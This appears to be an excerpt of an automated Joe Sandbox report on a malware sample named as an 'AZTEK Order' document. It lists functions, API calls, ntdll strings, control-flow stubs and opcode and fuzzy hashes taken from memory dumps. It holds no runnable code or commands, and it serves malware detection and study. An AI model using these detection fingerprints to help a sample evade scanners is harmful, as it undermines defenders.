                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                      • Instruction ID: 7538764d688f28e64d3d492fe8e1fb6d99a2cdbcdddd34a5648222fe9cda664d
                                                      • Opcode Fuzzy Hash: 863dc4bff13a2bdcc0c376cc7bbc13f0ec12c02fa508ca47bb0c3be5bc91d30a
                                                      • Instruction Fuzzy Hash: 61012672A4621876DB215B55AC02FEFB7689F81B20F000097FE04AB384D6B85A9187D9
                                                      Function 00414125 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadwindowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 40 414125-41417f 42 414186-4141b1 call 424973 40->42 43 414181 call 4047b3 40->43 46 4141d3-4141d8 42->46 47 4141b3-4141c4 PostThreadMessageW 42->47 43->42 47->46 48 4141c6-4141d0 47->48 48->46
                                                      APIs
                                                      • PostThreadMessageW.USER32(N77o9w1836,00000111,00000000,00000000), ref: 004141C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID: N77o9w1836$N77o9w1836
                                                      • API String ID: 1836367815-4204696664
                                                      • Opcode ID: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction ID: be414c5d9c22e3dbbac0c223527f73d90a181cd4a999129798f9bcd0ab32efbc
                                                      • Opcode Fuzzy Hash: 72420f6d607e8fd737dc359c4c0924d759aae12716c13a9b50de654840b7993e
                                                      • Instruction Fuzzy Hash: B0F02BB5E4126875D72156915C06FEF7B688F81B50F144096FE007B2C1D6F85A4287D9
                                                      Function 0042B973 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 100 42b973-42b9b4 call 404843 call 42c723 RtlAllocateHeap
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(?,0041E33B,?,?,00000000,?,0041E33B,?,?,?), ref: 0042B9AF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction ID: 608937f996600ceb944568eee28253b0e1a79cb224aaa0ff6171d668f3876b15
                                                      • Opcode Fuzzy Hash: b40e374f181a5e7f06088c0508af239026d99a37d8f66eebf1b14c84ad172e33
                                                      • Instruction Fuzzy Hash: DFE092B63042057BD610EE89EC41E9B37ACEFC9710F008419F909A7281D770BA10CBB5
                                                      Function 0042B9C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 105 42b9c3-42ba04 call 404843 call 42c723 RtlFreeHeap
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8BF45589,00000007,00000000,00000004,00000000,004173E6,000000F4,?,?,?,?,?), ref: 0042B9FF
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction ID: 42988263531b94dbbb2a4d015e1e709027e39004e6f1cdd4b6e0b11babbf2e4c
                                                      • Opcode Fuzzy Hash: fcd5d671ee9e321fa56ff1596bf8a23d3577d32d5066f935f20ed2a0fd690b71
                                                      • Instruction Fuzzy Hash: C3E06D762042447BD610EE59EC41EDB33ACEFC4710F004419F908A7241D671B9118AB4
                                                      Function 0042BA13 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 115 42ba13-42ba4c call 404843 call 42c723 ExitProcess
                                                      APIs
                                                      • ExitProcess.KERNEL32(?,00000000,?,?,EE1174AF,?,?,EE1174AF), ref: 0042BA47
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_400000_spec 4008670601 AZTEK Order.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                      • Instruction ID: 38e42b315f6343636fcddd2e2961c7e70ce04384088d5dfede6638441cba869f
                                                      • Opcode Fuzzy Hash: f4c8ccc93cc9a54f4d2a5ff418d0cbb94d9e43498e2faa9f5866a5e759374b8d
                                                      • Instruction Fuzzy Hash: 91E04F362102147BD110BA5ADC41FDBB76CDFC5714F004419FA0C67242D6707A1186E4
                                                      Function 017E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 120 17e2c0a-17e2c0f 121 17e2c1f-17e2c26 LdrInitializeThunk 120->121 122 17e2c11-17e2c18 120->122
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                      • Instruction ID: e459c39f64e16b2b85943c9682b89611a3127dd16eed8a43c9003c9788d0d412
                                                      • Opcode Fuzzy Hash: 1fdcfefc7d0969e85db29157ef8824090cb33c9324354dd062cd74acd2e58627
                                                      • Instruction Fuzzy Hash: B2B09B719055C5C5DF11E764460C717B954B7D5701F15C075D3030652F4738C1E5E276

                                                      Non-executed Functions

                                                      Function 01822349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2160512332
                                                      • Opcode ID: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                      • Instruction ID: 8af1926595144e664719099c543d6239645a31c6f83af2fda7198fb7c8928c53
                                                      • Opcode Fuzzy Hash: 3370b0c79cc6af109aebda36bf76147de2f193e5f961144e6cfe0a32d319c95e
                                                      • Instruction Fuzzy Hash: 5B92E371604352AFE722CF28C884F6BB7E9BB88714F04492DFA94D7251D770EA84CB52
                                                      Function 017D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                      • Critical section address., xrefs: 01815502
                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                      • 8, xrefs: 018152E3
                                                      • undeleted critical section in freed memory, xrefs: 0181542B
                                                      • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                      • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                      • Invalid debug info address of this critical section, xrefs: 018154B6
                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                      • Thread identifier, xrefs: 0181553A
                                                      • corrupted critical section, xrefs: 018154C2
                                                      • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                      • double initialized or corrupted critical section, xrefs: 01815508
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                      • API String ID: 0-2368682639
                                                      • Opcode ID: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                      • Instruction ID: db0cd0de0ea2dabeb252157a6494e28ae737315525ad82744414c8c8d37dbc90
                                                      • Opcode Fuzzy Hash: a64d938aae27370ced7129eb08e7b3357543e7c48eb416baa0db35d11cd753cd
                                                      • Instruction Fuzzy Hash: 8581ADB2A80348EFDB20CF99C854BAEFBB9BB49714F544119F504F7685D371AA40CB91
                                                      Function 017D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                      • @, xrefs: 0181259B
                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                      • API String ID: 0-4009184096
                                                      • Opcode ID: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                      • Instruction ID: 0bff5b4e52c41f9f11f252153d8381a95195ca85b7903b323f6f691ad1b6a74a
                                                      • Opcode Fuzzy Hash: 159438d2c73410483c86874a606c57efd151670b0af3099b3fcd80cf20afff51
                                                      • Instruction Fuzzy Hash: 38026EF2D002299BDB21DB54CC84BDAF7B8AB54704F1041DAE60DA7246EB709F85CF59
                                                      Function 01848B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                      • API String ID: 0-2515994595
                                                      • Opcode ID: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                      • Instruction ID: 5b11e349eb1539affaa253d6224e38101eef20c4b79da48520774aef80490471
                                                      • Opcode Fuzzy Hash: 6e5f8f03f5957edf70b373030a5b55bddc7efbf5a7d230236879ddfaaf0042e4
                                                      • Instruction Fuzzy Hash: 1851CEB15093099BC729DF58C848BABBBE8EF95344F14492DE999C3241EB70D604CB96
                                                      Function 01850274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                      • API String ID: 0-1700792311
                                                      • Opcode ID: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                      • Instruction ID: 1409db73d74ced25fe829667a40be196cfba52db31bbbf0763e4cd3842ae7b6d
                                                      • Opcode Fuzzy Hash: 16eef42e35897a9cfe0ed727799daf385c67720d2541158dda97b48029461310
                                                      • Instruction Fuzzy Hash: DDD1CA7150068AEFDB62DF68D494AAEFBF1FF49718F088049F8459B312C7349A85CB10
                                                      Function 018289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • VerifierDlls, xrefs: 01828CBD
                                                      • VerifierFlags, xrefs: 01828C50
                                                      • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                      • VerifierDebug, xrefs: 01828CA5
                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                      • HandleTraces, xrefs: 01828C8F
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                      • API String ID: 0-3223716464
                                                      • Opcode ID: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                      • Instruction ID: 29775bbd1fe31c951cd8018c090955bd3ee2bcce6d09112f024b4ac44e676da0
                                                      • Opcode Fuzzy Hash: 3cdba77b6551707215038fd198ff2c64ac01dc10ade1584a87f916c71cf5ae2a
                                                      • Instruction Fuzzy Hash: FF914871A453269FEB23DF68C880B1AB7E4AB56B14F09045DFA41EB241C7709B84CB91
                                                      Function 017AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                      • API String ID: 0-1109411897
                                                      • Opcode ID: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                      • Instruction ID: 34346c81525637b59a0d8f946af4884f9f2eff56466dc3f9fca8a4001475ddfd
                                                      • Opcode Fuzzy Hash: 3f1dde68de39c76be59161bcd304b477d2e5027aad8928fac2069f9d60fa57f3
                                                      • Instruction Fuzzy Hash: A6A23B74A0562A8FDB65DF18CC887ADFBB5AF85304F5442E9D90DA7290DB309E85CF40
                                                      Function 017D63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-792281065
                                                      • Opcode ID: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                      • Instruction ID: 364d9d1f0641d17039d6551c71febc1b4acacf259418f9ecdf1ff633e49260e3
                                                      • Opcode Fuzzy Hash: 79361569d3b3ec22c7c746b0cc041bcdf7b86f73da55cc01b31e9fa18623a4c0
                                                      • Instruction Fuzzy Hash: 8A915C71B403159BEB35DF58D848BAEBBB5BB40B24F180129FA01A7289D7744B41CBD1
                                                      Function 0179645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                      • Getting the shim user exports failed with status 0x%08lx, xrefs: 017F9A01
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                      • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                      • apphelp.dll, xrefs: 01796496
                                                      • Loading the shim user DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-204845295
                                                      • Opcode ID: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                      • Instruction ID: 2b4994b7621936471a9f91e32675e67dc876b61253dac830753d33a829657812
                                                      • Opcode Fuzzy Hash: 8df74b2bb7350d07e0666e991c4b7db117afc9424b8afa64b7fcbcf70c94a6f9
                                                      • Instruction Fuzzy Hash: 5251B2712483019FEB25DF24D895B9BF7E4FF84748F14091DFA8597265E630EA08CB92
                                                      Function 017D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                      • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                      • API String ID: 0-861424205
                                                      • Opcode ID: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                      • Instruction ID: 2667dae5321faeaf1b90dbdbbd6d15954921ab9c0823a39e3cbbd7adae10a5df
                                                      • Opcode Fuzzy Hash: d632fb744078241de71e70ab12834ba7790d1c2dcc2582e67cfb70fbd03b1913
                                                      • Instruction Fuzzy Hash: ED313576F802297BEB21DA998C81F5AFB7DDF65B50F250059FB05EB105D270AB01C3A1
                                                      Function 017DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                      • LdrpInitializeProcess, xrefs: 017DC6C4
                                                      • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                      • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-475462383
                                                      • Opcode ID: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                      • Instruction ID: f6997fc0e2f137ebe38b47aef82d6781814bd5dff79401570e42a0f2db679e18
                                                      • Opcode Fuzzy Hash: 5114eec50e239e8a8d000d00e07f69ebbe7895b0041cf688b994034da0d95559
                                                      • Instruction Fuzzy Hash: 5F3117B26443469FC215EF2CDC4AE1AF7E4EF94B10F04055CF9459B299E620EE04C7A2
                                                      Function 017E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                      • String ID:
                                                      • API String ID: 1404860816-0
                                                      • Opcode ID: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                      • Instruction ID: 77b3c1892c847f0c2f12c6844d2774c1c80d72de7009a155def703c35c1fd953
                                                      • Opcode Fuzzy Hash: f9463549ef92185ede80c7e1df5c0b32f7e8da2fde19c92428392fcfb1208496
                                                      • Instruction Fuzzy Hash: FE426D72A00715DFDB21CF28C894BAAB7F9FF08314F1445A9E989DB245D770AA84CF60
                                                      Function 017AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                      • API String ID: 0-379654539
                                                      • Opcode ID: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                      • Instruction ID: 54aaf231e38e0a351435c35b25a278ac7f5225bba743e9fb5c22e4c504b0a20f
                                                      • Opcode Fuzzy Hash: 660de2818804d0e3a2fc607099bd89a6cff5c22638d1e4c8c5f6551bc2a501c5
                                                      • Instruction Fuzzy Hash: 5EC18970108386CFD722CF58C444B6ABBE4BF84704F448A6AF995CB291E774CA49CB56
                                                      Function 017D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrpInitializeProcess, xrefs: 017D8422
                                                      • @, xrefs: 017D8591
                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2526178534.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_1770000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1918872054
